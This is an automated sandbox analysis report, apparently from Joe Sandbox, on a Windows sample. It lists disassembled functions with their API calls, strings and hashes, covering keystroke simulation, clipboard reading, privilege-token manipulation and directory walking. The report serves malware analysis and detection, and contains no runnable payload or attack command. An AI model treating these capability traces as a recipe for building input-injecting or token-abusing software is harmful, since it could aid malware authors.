Opcode ID: 4fd81840d0be25ad8f7249fa9aa04ecc696b1eca7d17f994e6e96e349dca0a5d
Instruction ID: b767ed98adecfc493e6d996e4ce07c9ce31131c11d7961d1b2be61f120c5a030
Opcode Fuzzy Hash: 4fd81840d0be25ad8f7249fa9aa04ecc696b1eca7d17f994e6e96e349dca0a5d
Instruction Fuzzy Hash: 13E0CD769052285BC721E6589C05FFA77EDDF88791F0441B6FC0CD7354EA649C918690

Function 00339129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0033914B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: a3203895c81080d003259f5e71d430583374144af0e924394600098d1f8cae61
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: C9E092B0514B009FE7358A24D8507E373E0AB06315F00081DF29A93341EBA278418B59

Function 002D5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0030E16B,?,?,00000000), ref: 002D5DBF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 17e89583825223081cd1cab2aa8aa5cb5e50ef2a5e0e1c1d8f7e6a412d8cb628
Instruction ID: 1b48a065058f7db4790c8015f907b6f5eae09d507836c7d3e3d75b01a56ebaf1
Opcode Fuzzy Hash: 17e89583825223081cd1cab2aa8aa5cb5e50ef2a5e0e1c1d8f7e6a412d8cb628
Instruction Fuzzy Hash: CBD0C77464030CBFE710DB80DC46FAA777CDB05711F100194FD0497290D6B27E508795

Function 002F548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 002F5496

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 892bb64f16b342b6cd488db8c6662bbd9bdd983c1b941a3641069da738346768
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 3BB0927684020C77DE012E82EC02A697F199B406B8F808020FB0C18162A673A6B0AA89

Function 0033D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0033D46A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c892eda9fb5d342427806b51dbe552f737f5658d039da4d5b7f10d25c13c76ff
Instruction ID: 72c1d7871d90060b5afd22b2f077ff87d7bbb6d6f642a42c9fee643796e1745b
Opcode Fuzzy Hash: c892eda9fb5d342427806b51dbe552f737f5658d039da4d5b7f10d25c13c76ff
Instruction Fuzzy Hash: C4714B342187028FD715EF24D4D1A6AB7E4AF88314F04496EF8968B3A2DB70ED59CF52

Function 002F0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 002F0EF7

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 404954f9a3eaf8d85f43026b9ec559d09ad7b3fe6dff9a5646d924b08c7f9fa9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1C31E470A2010ADFC718DF58C4C0969F7A6FF59380B648AA5E50ACB652DB71EDE1CBC0

Function 018F22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 018F22B1

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 7d837e3cb8ffa4c54725d2eb179f210cd44a3ac3b28bb7ddeb87354984ffa801
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F3E0E67498110EDFDB00EFB8D54969E7FB4EF04311F100165FD01D2281D6309E509A72

Non-executed Functions

Function 0035CDAC Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 637windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0035CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0035CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035CF00
SendMessageW.USER32 ref: 0035CF29
_wcsncpy.LIBCMT ref: 0035CFA1
GetKeyState.USER32(00000011), ref: 0035CFC2
GetKeyState.USER32(00000009), ref: 0035CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035CFE5
GetKeyState.USER32(00000010), ref: 0035CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D018
SendMessageW.USER32 ref: 0035D03F
SendMessageW.USER32(?,00001030,?,0035B602), ref: 0035D145
SetCapture.USER32(?), ref: 0035D177
ClientToScreen.USER32(?,?), ref: 0035D1DC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0035D203
ReleaseCapture.USER32 ref: 0035D20E
GetCursorPos.USER32(?), ref: 0035D248
ScreenToClient.USER32(?,?), ref: 0035D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D2B1
SendMessageW.USER32 ref: 0035D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D31C
SendMessageW.USER32 ref: 0035D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0035D37B
GetCursorPos.USER32(?), ref: 0035D39B
ScreenToClient.USER32(?,?), ref: 0035D3A8
GetParent.USER32(?), ref: 0035D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D431
SendMessageW.USER32 ref: 0035D462
ClientToScreen.USER32(?,?), ref: 0035D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0035D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D51A
SendMessageW.USER32 ref: 0035D53D
ClientToScreen.USER32(?,?), ref: 0035D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0035D5C3

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

GetWindowLongW.USER32(?,000000F0), ref: 0035D65F

Strings

@GUI_DRAGID, xrefs: 0035D1AA
F, xrefs: 0035D543
pr9, xrefs: 0035D1BD

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pr9
API String ID: 302779176-397173136
Opcode ID: 8c040190b07c50b5c111c13971b9d1306d2d3cd7efbd04a063ed208375c54a46
Instruction ID: 1edcf1ab67011b8cd5ebeffec3339ae390277bd781dedde33995144aec3bcbca
Opcode Fuzzy Hash: 8c040190b07c50b5c111c13971b9d1306d2d3cd7efbd04a063ed208375c54a46
Instruction Fuzzy Hash: 1B42AF70114341AFDB26CF28C885EAABBF9FF4931AF15051DFA55872B0C7319858CB92

Function 0035804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0035873F

Strings

%d/%02d/%02d, xrefs: 00358478

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 8ac3afa6b855e59cbcdd54b39fc764d83551cfa96278a76ef1fba8427585702f
Instruction ID: e148c68cab93deaf1f0546e3acf8882713d9885bab321cfa542b3821be13492c
Opcode Fuzzy Hash: 8ac3afa6b855e59cbcdd54b39fc764d83551cfa96278a76ef1fba8427585702f
Instruction Fuzzy Hash: 9612AE71500208AFEB269F24CC49FAB7BF8EF49752F214569F915EA2B1DF708949CB10

Function 002E710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002E75C2
_memset.LIBCMT ref: 002E76B1
_memmove.LIBCMT ref: 002E7C4B
_memmove.LIBCMT ref: 002E7E4F

Strings

\b(?<=\w), xrefs: 00323C41
\b(?=\w), xrefs: 00323C34
Oa., xrefs: 0032287E
Q\E, xrefs: 002E81C1
[:<:]], xrefs: 002E75F1
DEFINE, xrefs: 003225AF
0w8, xrefs: 00321F5B
[:>:]], xrefs: 002E760A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove$_memset
String ID: 0w8$DEFINE$Oa.$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2649377584
Opcode ID: 2a3faa96280b8e0edad5852fad9c34dcfb61fe760d25c369401fecab2b364ac7
Instruction ID: 945e2f170b81e4ca0e1026f71d31b730e9af96499d8486104ec0f8f4c6fee143
Opcode Fuzzy Hash: 2a3faa96280b8e0edad5852fad9c34dcfb61fe760d25c369401fecab2b364ac7
Instruction Fuzzy Hash: AE93D231E5022ADFDB25CF59D881BADB7B1FF48310F65816AE945EB280E7749E81CB40

Function 002D4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 002D4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0030DA8E
IsIconic.USER32(?), ref: 0030DA97
ShowWindow.USER32(?,00000009), ref: 0030DAA4
SetForegroundWindow.USER32(?), ref: 0030DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0030DAC4
GetCurrentThreadId.KERNEL32 ref: 0030DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0030DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0030DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0030DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0030DAF8
SetForegroundWindow.USER32(?), ref: 0030DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0030DB10
keybd_event.USER32(00000012,00000000), ref: 0030DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0030DB25
keybd_event.USER32(00000012,00000000), ref: 0030DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0030DB33
keybd_event.USER32(00000012,00000000), ref: 0030DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0030DB42
keybd_event.USER32(00000012,00000000), ref: 0030DB47
SetForegroundWindow.USER32(?), ref: 0030DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0030DB71

Strings

Shell_TrayWnd, xrefs: 0030DA89

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 58ceefc973b646cb3e1660faced9689658711c9589d5f3cf818c76cb8e0f6051
Instruction ID: 28f9e74ab9af55944dbe45956a03d80f79f6d42170be0203120b5797e2c526df
Opcode Fuzzy Hash: 58ceefc973b646cb3e1660faced9689658711c9589d5f3cf818c76cb8e0f6051
Instruction Fuzzy Hash: E8317471A41318BFEB226FA19C49F7F7EACEB44B51F114065FA05EB1E0D6B05D00ABA0

Function 0034425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0035F910), ref: 00344284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00344292
GetClipboardData.USER32(0000000D), ref: 0034429A
CloseClipboard.USER32 ref: 003442A6
GlobalFix.KERNEL32(00000000), ref: 003442C2
CloseClipboard.USER32 ref: 003442CC
GlobalUnWire.KERNEL32(00000000), ref: 003442E1
IsClipboardFormatAvailable.USER32(00000001), ref: 003442EE
GetClipboardData.USER32(00000001), ref: 003442F6
GlobalFix.KERNEL32(00000000), ref: 00344303
GlobalUnWire.KERNEL32(00000000), ref: 00344337
CloseClipboard.USER32 ref: 00344447

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
String ID:
API String ID: 941120096-0
Opcode ID: 64a795462052363fadfaa654887c6975c5435450de4f08848709e3a5c97643d1
Instruction ID: dd0708294406309bd4fda62bbdd6ba9129c10d72e4ba5f328b4f7142e0af6c3c
Opcode Fuzzy Hash: 64a795462052363fadfaa654887c6975c5435450de4f08848709e3a5c97643d1
Instruction Fuzzy Hash: 6F514F75204302AFD312AF61EC86F6E77ACAF84B01F11493AB555DA2A1DB70A9058B62

Function 00328858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00328CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00328D0D
Part of subcall function 00328CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00328D3A
Part of subcall function 00328CC3: GetLastError.KERNEL32 ref: 00328D47

_memset.LIBCMT ref: 0032889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003288ED
CloseHandle.KERNEL32(?), ref: 003288FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00328915
GetProcessWindowStation.USER32 ref: 0032892E
SetProcessWindowStation.USER32(00000000), ref: 00328938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00328952

Part of subcall function 00328713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328851), ref: 00328728
Part of subcall function 00328713: CloseHandle.KERNEL32(?,?,00328851), ref: 0032873A

Strings

, xrefs: 003288AA
default, xrefs: 0032894D
winsta0, xrefs: 00328910

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 556797bf27da3c2aa0f1a58ac71ac52387a83bbf032d3fe04040c877b7ecd199
Instruction ID: 2aeb7d08ea8c2d62d1875f648ae580f6eeac487d8652dd5e5b47bce89648002a
Opcode Fuzzy Hash: 556797bf27da3c2aa0f1a58ac71ac52387a83bbf032d3fe04040c877b7ecd199
Instruction Fuzzy Hash: CA815971902219AFDF12DFA4EC45AEEBBB8FF08345F08456AF910A6161DF318E14DB60

Function 0033C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0033C9F8
FindClose.KERNEL32(00000000), ref: 0033CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0033CAAF
__swprintf.LIBCMT ref: 0033CAFB
__swprintf.LIBCMT ref: 0033CB3E

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

__swprintf.LIBCMT ref: 0033CB92

Part of subcall function 002F38D8: __woutput_l.LIBCMT ref: 002F3931

__swprintf.LIBCMT ref: 0033CBE0

Part of subcall function 002F38D8: __flsbuf.LIBCMT ref: 002F3953
Part of subcall function 002F38D8: __flsbuf.LIBCMT ref: 002F396B

__swprintf.LIBCMT ref: 0033CC2F
__swprintf.LIBCMT ref: 0033CC7E
__swprintf.LIBCMT ref: 0033CCCD

Strings

%02d, xrefs: 0033CB86, 0033CB90, 0033CBDE, 0033CC2D, 0033CC7C, 0033CCCB
%4d, xrefs: 0033CB38
%4d%02d%02d%02d%02d%02d, xrefs: 0033CAF5

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 6d2862d43adb1ee0f60662b0d7a71e42ebf4f96af46c54878d61bacc18273ac8
Instruction ID: d5bd9716b34f57dd1aa7b64aa8ed30f25865797201bc178ce1866245d0cb4d75
Opcode Fuzzy Hash: 6d2862d43adb1ee0f60662b0d7a71e42ebf4f96af46c54878d61bacc18273ac8
Instruction Fuzzy Hash: 3CA140B2428354AFC710EB54C885DAFB7ECFF94705F40492AB586D3291EA34DE58CB62

Function 0033F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0033F221
_wcscmp.LIBCMT ref: 0033F236
_wcscmp.LIBCMT ref: 0033F24D
GetFileAttributesW.KERNEL32(?), ref: 0033F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0033F279
FindNextFileW.KERNEL32(00000000,?), ref: 0033F291
FindClose.KERNEL32(00000000), ref: 0033F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0033F2B8
_wcscmp.LIBCMT ref: 0033F2DF
_wcscmp.LIBCMT ref: 0033F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0033F308
SetCurrentDirectoryW.KERNEL32(0038A5A0), ref: 0033F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F330
FindClose.KERNEL32(00000000), ref: 0033F33D
FindClose.KERNEL32(00000000), ref: 0033F34F

Strings

*.*, xrefs: 0033F2B3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
